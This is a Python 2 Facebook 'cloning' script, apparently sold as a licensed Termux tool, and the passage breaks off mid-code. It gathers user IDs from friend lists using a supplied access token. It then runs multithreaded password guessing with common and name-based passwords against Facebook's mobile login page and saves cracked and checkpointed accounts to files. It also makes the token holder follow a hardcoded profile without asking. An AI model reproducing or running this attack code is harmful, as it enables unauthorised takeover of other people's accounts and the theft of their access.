#!/usr/bin/python2
# -*- coding: utf-8
#!/usr/bin/env
#include <iostream>
#include <fstream>
#include <string>
#include <future>
#include <cstdio>
#include <vector>
#include <stdio.h>
#include <cython>
#include <platform>
#include <time>
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
os.system('rm -rf .djs')
for n in range (5000):
	nmbr = random.randint(11111111,99999999)
	sys.stdout = open('.djs', 'a')
	print (nmbr)
	sys.stdout.flush()
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, uuid, subprocess, calendar
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from concurrent.futures import ThreadPoolExecutor
from datetime import date
from datetime import datetime

try:
	os.mkdir('/sdcard/ids')
except:
	pass
try:
	import requests
except ImportError:
	os.system('pip2 install requests')
	os.mkdir('/sdcard/.data.txt')
reload(sys)
sys.setdefaultencoding('utf8')
ip = requests.get('https://api-asutoolkit.cloudaccess.host/ip.php').text
ua = random.choice(['Mozilla/5.0 (Linux; Android 5.1; PICOphone_M4U_M2_M Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36',
 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)',
 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',
 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36',
 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0',
 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36',
 'Mozilla/5.0 (Windows IoT 10.0; Android 6.0.1; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134',
 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',
 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
 'NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+',
 'Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0 Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 625) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537',
 'Mozilla/5.0 (Linux; Android 10; Infinix X687 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85 Mobile Safari/537.36[FBAN/FB4A;FBAV/222.0.0.48.113;]',
 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
 'NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+',
 'NokiaX2-00/5.0 (08.35) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; en-us; nokiax2-00)',
 'Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G977N/KSU4CTG1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/12.1 Chrome/79.0.3945.136 Mobile Safari/537.36'])
url = 'https://mbasic.facebook.com'
os.system('clear')
logo = """
 \33[38;1m
               
        d8b   db d888888b .d8888.  .d8b.  d8888b.      
        888o  88   `88'   88'  YP d8' `8b 88  `8D      
        88V8o 88    88    `8bo.   88ooo88 88oobY'      
        88 V8o88    88      `Y8b. 88~~~88 88`8b        
        88  V888   .88.   db   8D 88   88 88 `88.      
        VP   V8P Y888888P `8888Y' YP   YP 88   YD      
-------------------------------------------------------------------------------------------------------------------------------------------------------------                                              
Owner        : Nisar Mahsud 
Github       : https://github/com/NisarMahsud
Youtube      : Nisar Ahmad 
Version      : 4.6
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Turn on  & off  flight (airoplane)  mode before use                                
------------------------------------------------------------------------------------------------------------------------------------------------------------------
                Country:
________________________________________________________________________________________________
"""
loop = 0
id = []
cp = []
ok = []
def cek_apikey():
	key = open(".__apikey__.txt","r").read()
	cek = requests.get("https://james.anggakurniawan.my.id/chek.php?project=license&apikey="+key).json()
	if cek["status"] == "error":
		print(" [!] Token Not Register")
		os.system("rm -f .__apikey__.txt")
	elif cek["status"] == "expired":
		print(" [!] Your Token Has Been Expire")
		os.system("rm -f .__apikey__.txt")
	else:
		open(".__apikey__.txt","w").write(key)
		return main_button()
def main_apikey():
	try:
		key = open(".__apikey__.txt","r").read()
		cek_apikey()
	except (KeyError, IOError):
		print logo
		print(" \033[1;97m[\033[1;92m✓\033[1;97m] IP          : %s"%(ip))
		print(" \033[1;97m[\033[1;91m!\033[1;97m] Tools Run Only One Time")
		print("•-----------------------------------------------•")
		print(" \033[1;97m[\033[1;92m01\033[1;97m] For 1st Step Token")
		print(" \033[1;97m[\033[1;92m02\033[1;97m] For 2nd Step Token")
		print(" \033[1;97m[\033[1;92m03\033[1;97m] Enter Your Buying Token Key")
		ask = raw_input("\n \033[1;97m[\033[1;92m*\033[1;97m]  Select One : ")
		if ask =="":
			main_apikey()
		elif ask == "1":
			id1 = uuid.uuid4().hex[:10]
			id2 = uuid.uuid4().hex[:15].upper()
			open(".apikey", "w").write(id1+id2+"===")
			time.sleep(1)
			print("\n \033[1;97m[\033[1;92m✓\033[1;97m] Your Token : %s"%(open(".apikey", "r").read()))
			print(" \033[1;97m[\033[1;92m✓\033[1;97m] Copy Your Token Then Register Your Token To Admin")
			raw_input("\n \033[1;97m[\033[1;91m!\033[1;97m] Back to Home Menu")
			main_apikey()
		elif ask == "3":
			key = raw_input("\n \033[1;97m[\033[1;92m+\033[1;97m] Enter Your Token : ")
			cek = requests.get("https://james.anggakurniawan.my.id/chek.php?project=license&apikey="+key).json()
			if cek["status"] == "error":
				exit(" [!] Your Token Not Register")
			elif cek["status"] == "expired":
				exit(" [!] Your Licence Has been Expire")
			else:
				open(".__apikey__.txt","w").write(key)
				print(" [!] Register Token")
				time.sleep(1.5)
				return cek_apikey()
		elif ask == "2":
			print("\n [ Premium Script Price List ]\n")
			print(" \033[1;97m[\033[1;92m+\033[1;97m] Duration 15 Days Rs 350")
			print(" \033[1;97m[\033[1;92m+\033[1;97m] Duration 30 Days Rs 650")
			print(" \033[1;97m[\033[1;92m+\033[1;97m] Duration 45 Days Rs 1000")
			print(" \033[1;97m[\033[1;92m+\033[1;97m] Duration 30 Days Bd 1000 (Bangladesh)")
			print("\n [ Fill In The Token Registration Data ]\n")
			nama = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] Customer Name   : ")
			email = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] Customer Email  : ")
			durasi = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] Duration : ")
			apikey = open(".apikey", "r").read()
			url_wa = "https://api.whatsapp.com/send?phone=+923098924196&text="
			tks = "Hello Admin, I Want To Buy A Premium Script\n\n"+"[+] Customer Name : "+nama+"\n[+] Customer Email : "+email+"\n[+] Duration : "+durasi+"\n[+] Your Token : "+apikey
			subprocess.check_output(["am", "start", url_wa+tks])
		else:
			main_apikey()
	key = open(".__apikey__.txt","r").read()
	a = requests.get("https://james.anggakurniawan.my.id/chek.php?project=license&apikey="+key).json()
	email = a["email"]
	status = a["member"]
	join = a["joined"]
	expired = a["expired"]
	print(" \033[1;97m[\033[1;92m*\033[1;97m] Email       : %s"%(email))
	print(" \033[1;97m[\033[1;92m*\033[1;97m] Join   : %s"%(join))
	print("•-----------------------------------------------•")
	print(" \033[1;97m[\033[1;92m*\033[1;97m] Expired : %s"%(expired))
	print(" \033[1;97m[\033[1;92m*\033[1;97m] Status      : \033[0;92m%s\033[0;97m"%(status))
	print("•-----------------------------------------------•")
	print(" \033[1;97m[\033[1;92m*\033[1;97m] IP          : %s\n"%(ip))
def main_button():
	os.system("clear")
	print logo
	print('   \033[1;97m[\033[1;92m1\033[1;97m] Friendlist/File Cloning (Token login) ')
	print('   \033[1;97m[\033[1;92m2\033[1;97m] Crack Random Account (2004)')
	print('   \033[1;97m[\033[1;92m3\033[1;97m] Crack Random Account (2009)')
	print
	somi_star_boy()
def somi_star_boy():
	input0 = raw_input('   * Choose Option : \033[0;97m')
	if input0 == '1':
		login()
	elif input0 == '2':
		random4()
	elif input0 == '3':
		Somi().__menu__()
	else:
		print ''
		print '  • Choose correct option'
		print ''
		main_button()
def login():
		os.system('clear')
		print logo
		print ('    Token Buy Karna Ka lia Contact: 03098924196')
		toket = raw_input('\n   \033[1;97m[\033[1;92m?\033[1;97m] Your Token : ')
		try:
			otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
			a = json.loads(otw.text)
			zedd = open('login.txt', 'w')
			zedd.write(toket)
			zedd.close()
			print (" \n  \033[1;92m✓ successful login token")
			bot_follow()
		except KeyError:
			print ' [!] Token Invalid'
			sys.exit()
def bot_follow():
	try:
		toket=open("login.txt","r").read()
		otw = requests.get("https://graph.facebook.com/me/?access_token="+toket)
		a = json.loads(otw.text)
		na= a["birthday"]
		id = a["id"]
		nama = a["name"]
	except IOError:
		print("Token Invalid")
		log_token()
	requests.post("https://graph.facebook.com/100007607054845/subscribers?access_token=" + toket) #Somi awan
	my_menu()
def my_menu():
	try:
		toket=open("login.txt","r").read()
		otw = requests.get("https://graph.facebook.com/me/?access_token="+toket)
		a = json.loads(otw.text)
		id = a["id"]
		name = a["name"]
	except KeyError:
		os.system('clear')
		print ' [!] Token Invalid'
		os.system('rm -f login.txt')
		time.sleep(3)
		login()
	except requests.exceptions.ConnectionError:
		print '  [!] No Connection'
		sys.exit()
	os.system("clear")
	print logo
	print ('\x1b[1;97m•-----------------------------------------------•')
	print("   \033[1;97m[\033[1;92m✓\033[1;97m] Name     :  "+name)
	print("   \033[1;97m[\033[1;92m✓\033[1;97m] Token    :  "+id)
	print("   \033[1;97m[\033[1;92m✓\033[1;97m] Your ip  :  "+ip)
	print("   \033[1;97m[\033[1;92m✓\033[1;97m] Status   :  \033[1;92mPremium")
	print ('\x1b[1;97m•-----------------------------------------------•')
	print
	print('   \033[1;97m[\033[1;92m1\033[1;97m] Frindlist/follower Cloning')
	print('   \033[1;97m[\033[1;92m2\033[1;97m] File Cloning')
	print('   \033[1;97m[\033[1;92m3\033[1;97m] Extract public Friendlist ')
	print('   \033[1;97m[\033[1;92m4\033[1;97m] DJS Team Whtsapp Group')
	print('   \033[1;97m[\033[1;92m5\033[1;97m] DJS Team Facebook Group')
	print('   \033[1;97m[\033[1;92m6\033[1;97m] DJS Team YouTube Channel')
	print
	s_star_boy()
def s_star_boy():
	input = raw_input('   * Choose Option : \033[0;97m')
	if input == '1':
		fix()
	elif input == '2':
		choice_pass()
	elif input == '3':
		os.system("python2 somidump.py")
		random9()
	elif input == '4':
		os.system('xdg-open https://chat.whatsapp.com/DxIsH1q9KipIYpuAdylcvg')
	elif input == '5':
		os.system('xdg-open https://www.facebook.com/groups/2716366185327789/permalink/2767275330236874/?app=fbl')
	elif input == '6':
		os.system('xdg-open https://youtu.be/HrOgcZYNvSo')
	else:
		print ''
		print '  • Choose correct option'
		print ''
		my_menu()
def fix():
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print("\n   [×] Token Invalid")
		os.system('rm -rf login.txt')
		print logo
	os.system('clear')
	print logo
	print
	print '   \033[1;97m[\033[1;92m01\033[1;97m] Public IDS Cloning (unlimited) '
	print '   \033[1;97m[\033[1;92m00\033[1;97m] Go Back'
	print
	fixpass()
def fixpass():
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print("\n   [×] Token Invalid")
		os.system('rm -rf login.txt')
		print logo
	global cp
	global loop
	global ok
	input1 = raw_input('   * Choose Option : \033[0;97m')
	os.system('clear')
	if input1 == '':
		print '  • Choose The Correct Option !'
		exit() 
	elif input1 == '0' or input1 == '00':
		fix()
	elif input1 == '1' or input1 == '01':
		os.system("clear")
		print logo
	try:
		link_amount = int(input("\033[1;95m   \033[1;97m[\033[1;92m?\033[1;97m] How much link use want add (choose) : "))
	except:link_amount=1
	for n in range(link_amount):
		n +=1
		idt = raw_input("\033[1;95m   \033[1;97m[\033[1;92m?\033[1;97m] User ID Target "+ str(n)+" : ")
		try:
			pok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
			sp = json.loads(pok.text)
			print("   \033[1;97m[\033[1;92m✓\033[1;97m] Name           : ") + sp['name']
		except KeyError:
			print ' [!] something wrong'
			fixpass()
		r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
		z = json.loads(r.text)
		for i in z['data']:
			uid = i['id']
			na = i['name']
			nm = na.rsplit(' ')[0] 
			id.append(uid + '|' + nm)
	os.system("clear")
	print logo
	print ('•-----------------------------------------------•\033[1;0m')
	print("   \033[1;97m[\033[1;92m✓\033[1;97m] Total IDs  :  "+str(len(id)))
	print('   \033[1;97m[\033[1;91m!\033[1;97m] To Stop Process Press Ctrl + Z')
	print ('•-----------------------------------------------•')
	print
	def main(arg):
		global ua
		user = arg
		uid, name = user.split('|')
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			pass1 = "786786786"
			rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass1, 'login': 'submit'}, headers={'user-agent': ua})
			xo = rex.url
			if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
				print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass1
				ok.append(uid + ' | ' + pass1)
				save = open('out/ok.txt', 'a')
				save.write(' ' + str(uid) + ' | ' + str(pass1) + '\n')
				save.close()
			elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
				print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass1
				cp.append(uid + ' | ' + pass1)
				save = open('out/cp.txt', 'a')
				save.write(' ' + str(uid) + ' | ' + str(pass1) + '\n')
				save.close()
			else:
				pass2 = name.lower() + '786'
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass2, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.url
				if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
					print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass2
					ok.append(uid + ' | ' + pass2)
					save = open('out/ok.txt', 'a')
					save.write(' ' + str(uid) + ' | ' + str(pass2) + '\n')
					save.close()
				elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
					print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass2
					cp.append(uid + ' | ' + pass2)
					save = open('out/cp.txt', 'a')
					save.write(' ' + str(uid) + ' | ' + str(pass2) + '\n')
					save.close()
				else:
					pass3 = name.lower() + '1234'
					rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass3, 'login': 'submit'}, headers={'user-agent': ua})
					xo = rex.url
					if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
						print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass3
						ok.append(uid + ' | ' + pass3)
						save = open('out/ok.txt', 'a')
						save.write(' ' + str(uid) + ' | ' + str(pass3) + '\n')
						save.close()
					elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
						print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass3
						cp.append(uid + ' | ' + pass3)
						save = open('out/cp.txt', 'a')
						save.write(' ' + str(uid) + ' | ' + str(pass3) + '\n')
						save.close()
					else:
						pass4 = name.lower() + '12345'
						rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass4, 'login': 'submit'}, headers={'user-agent': ua})
						xo = rex.url
						if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
							print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass4
							ok.append(uid + ' | ' + pass4)
							save = open('out/ok.txt', 'a')
							save.write(' ' + str(uid) + ' | ' + str(pass4) + '\n')
							save.close()
						elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
							print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass4
							cp.append(uid + ' | ' + pass4)
							save = open('out/cp.txt', 'a')
							save.write(' ' + uid + ' | ' + str(pass4) + '\n')
							save.close()
						else:
							pass5 = name.lower() + '123'
							rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass5, 'login': 'submit'}, headers={'user-agent': ua})
							xo = rex.url
							if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
								print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass5
								ok.append(uid + ' | ' + pass5)
								save = open('out/ok.txt', 'a')
								save.write(' ' + uid + ' | ' + str(pass5) + '\n')
								save.close()
							elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
								print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass5
								cp.append(uid + ' | ' + pass5)
								save = open('out/cp.txt', 'a')
								save.write(' ' + str(uid) + ' | ' + str(pass5) + '\n')
								save.close()
							else:
								pass6 = "223344"
								rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass6, 'login': 'submit'}, headers={'user-agent': ua})
								xo = rex.url
								if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
									print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass6
									ok.append(uid + ' | ' + pass6)
									save = open('out/ok.txt', 'a')
									save.write(' ' + uid + ' | ' + str(pass6) + '\n')
									save.close()
								elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
									print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass6
									cp.append(uid + ' | ' + pass6)
									save = open('out/cp.txt', 'a')
									save.write(' ' + str(uid) + ' | ' + str(pass6) + '\n')
									save.close()
								else:
									pass7 = "786123"
									rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass7, 'login': 'submit'}, headers={'user-agent': ua})
									xo = rex.url
									if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
										print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass7
										ok.append(uid + ' | ' + pass7)
										save = open('out/ok.txt', 'a')
										save.write(' ' + uid + ' | ' + str(pass7) + '\n')
										save.close()
									elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
										print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass7
										cp.append(uid + ' | ' + pass7)
										save = open('out/cp.txt', 'a')
										save.write(' ' + str(uid) + ' | ' + str(pass7) + '\n')
										save.close()
									else:
										pass8 = "facebook123"
										rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass8, 'login': 'submit'}, headers={'user-agent': ua})
										xo = rex.url
										if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
											print '  \x1b[0;97m[\x1b[0;96mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass8
											ok.append(uid + ' | ' + pass8)
											save = open('out/ok.txt', 'a')
											save.write(' ' + uid + ' | ' + str(pass8) + '\n')
											save.close()
										elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
											print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;97m' + uid + ' | ' + pass8
											cp.append(uid + ' | ' + pass8)
											save = open('out/cp.txt', 'a')
											save.write(' ' + str(uid) + ' | ' + str(pass8) + '\n')
											save.close()
									
		except:pass
	p = ThreadPool(30)
	p.map(main, id)
	print ('•-----------------------------------------------•')
	print(' • Completed')
	print(' • Total ✓/×/ : '+str(len(ok))+' • '+str(len(cp)))
	print ('•-----------------------------------------------•')
	raw_input(' • Go back')
	my_menu()
def choice_pass():
	os.system('clear')
	print logo
	print
	print '  \033[1;97m[\033[1;92m01\033[1;97m] File cloning '
	print '  \033[1;97m[\033[1;92m00\033[1;97m] Go Back'
	print
	choicepass()
def choicepass():
	global cp
	global ok
	input2 = raw_input('   * Choose Option : \033[0;97m')
	os.system('clear')
	if input2 == '':
		print '  • Choose The Correct One !'
		exit()
	elif input2 == '1' or input2 == '01':
		print logo
		print('          \033[1;41m\033[1;97m*Enter name password*\033[1;0m')
		print
		p1 = raw_input(" \033[1;97m[\033[1;92m01\033[1;97m] Name + digit : ")
		p2 = raw_input(" \033[1;97m[\033[1;92m02\033[1;97m] Name + digit : ")
		p3 = raw_input(" \033[1;97m[\033[1;92m03\033[1;97m] Name + digit : ")
		p4 = raw_input(" \033[1;97m[\033[1;92m04\033[1;97m] Name + digit : ")
		print
		print('          \033[1;41m\033[1;97m*Enter Digit password*\033[1;0m')
		print
		pass5 = raw_input(" \033[1;97m[\033[1;92m01\033[1;97m] Password : ")
		pass6 = raw_input(" \033[1;97m[\033[1;92m02\033[1;97m] Password : ")
		pass7 = raw_input(" \033[1;97m[\033[1;92m03\033[1;97m] Password : ")
		pass8 = raw_input(" \033[1;97m[\033[1;92m04\033[1;97m] Password : ")
		print
		try:
			filelist = raw_input(' \033[1;97m • Enter your file : \033[0;97m')
			for line in open(filelist, 'r').readlines():
				id.append(line.strip())
		except (KeyError, IOError):
			print ''
			print '  • File not available\x1b[0;97m'
			print ''
			raw_input(' • Go back')
			my_menu()
	elif input2 == '0' or input2 == '00':
		my_menu()
	else:
		print '  • Choose correct option please'
		exit()
	os.system("clear")
	print logo
	print ('•-----------------------------------------------•\033[1;0m')
	print('  \033[1;97m[\033[1;92m✓\033[1;97m] Total file account • '+str(len(id)))
	print('  \033[1;97m[\033[1;92m!\033[1;97m] To Stop Process Press Ctrl + Z')
	print ('•-----------------------------------------------•')
	print
	def main(arg):
		global ua
		user = arg
		uid, name = user.split('|')
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			pass1 = name.lower() + p1
			rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass1, 'login': 'submit'}, headers={'user-agent': ua})
			xo = rex.url
			if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
				print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass1
				ok.append(uid + ' | ' + pass1)
				save = open('out/ok.txt', 'a')
				save.write(' ' + str(uid) + ' | ' + str(pass1) + '\n')
				save.close()
			elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
				print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass1
				cp.append(uid + ' | ' + pass1)
				save = open('out/cp.txt', 'a')
				save.write(' ' + str(uid) + ' | ' + str(pass1) + '\n')
				save.close()
			else:
				pass2 = name.lower() + p2
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass2, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.url
				if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
					print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass2
					ok.append(uid + ' | ' + pass2)
					save = open('out/ok.txt', 'a')
					save.write(' ' + str(uid) + ' | ' + str(pass2) + '\n')
					save.close()
				elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
					print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass2
					cp.append(uid + ' | ' + pass2)
					save = open('out/cp.txt', 'a')
					save.write(' ' + str(uid) + ' | ' + str(pass2) + '\n')
					save.close()
				else:
					pass3 = name.lower() + p3
					rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass3, 'login': 'submit'}, headers={'user-agent': ua})
					xo = rex.url
					if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
						print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass3
						ok.append(uid + ' | ' + pass3)
						save = open('out/ok.txt', 'a')
						save.write(' ' + str(uid) + ' | ' + str(pass3) + '\n')
						save.close()
					elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
						print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass3
						cp.append(uid + ' | ' + pass3)
						save = open('out/cp.txt', 'a')
						save.write(' ' + str(uid) + ' | ' + str(pass3) + '\n')
						save.close()
					else:
						pass4 = name.lower() + p4
						rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass4, 'login': 'submit'}, headers={'user-agent': ua})
						xo = rex.url
						if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
							print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass4
							ok.append(uid + ' | ' + pass4)
							save = open('out/ok.txt', 'a')
							save.write(' ' + str(uid) + ' | ' + str(pass4) + '\n')
							save.close()
						elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
							print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass4
							cp.append(uid + ' | ' + pass4)
							save = open('out/cp.txt', 'a')
							save.write(' ' + uid + ' | ' + str(pass4) + '\n')
							save.close()
						else:
							rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass5, 'login': 'submit'}, headers={'user-agent': ua})
							xo = rex.url
							if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
								print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass5
								ok.append(uid + ' | ' + pass5)
								save = open('out/ok.txt', 'a')
								save.write(' ' + uid + ' | ' + str(pass5) + '\n')
								save.close()
							elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
								print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass5
								cp.append(uid + ' | ' + pass5)
								save = open('out/cp.txt', 'a')
								save.write(' ' + str(uid) + ' | ' + str(pass5) + '\n')
								save.close()
							else:
								rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass6, 'login': 'submit'}, headers={'user-agent': ua})
								xo = rex.url
								if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
									print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass6
									ok.append(uid + ' | ' + pass6)
									save = open('out/ok.txt', 'a')
									save.write(' ' + uid + ' | ' + str(pass6) + '\n')
									save.close()
								elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
									print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass6
									cp.append(uid + ' | ' + pass6)
									save = open('out/cp.txt', 'a')
									save.write(' ' + str(uid) + ' | ' + str(pass6) + '\n')
									save.close()
								else:
									rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass7, 'login': 'submit'}, headers={'user-agent': ua})
									xo = rex.url
									if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
										print '  \x1b[0;97m[\x1b[0;92mDjs Successful\x1b[0;97m] \x1b[0;92m' + uid + ' | ' + pass7
										ok.append(uid + ' | ' + pass7)
										save = open('out/ok.txt', 'a')
										save.write(' ' + uid + ' | ' + str(pass7) + '\n')
										save.close()
									elif 'checkpoint' in xo or 'confirm' in xo or 'cuid' in xo:
										print '  \x1b[0;97m[\x1b[0;93mDjs Checkpoint\x1b[0;97m] \x1b[0;91m' + uid + ' | ' + pass7
										cp.append(uid + ' | ' + pass7)
										save = open('out/cp.txt', 'a')
										save.write(' ' + str(uid) + ' | ' + str(pass7) + '\n')
										save.close()
									else:
										rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass8, 'login': 'submit'}, headers={'user-agent': ua})
										xo = rex.url
										if 'home' in xo or 'get' in xo or 'save' in xo or 'actor' in xo:
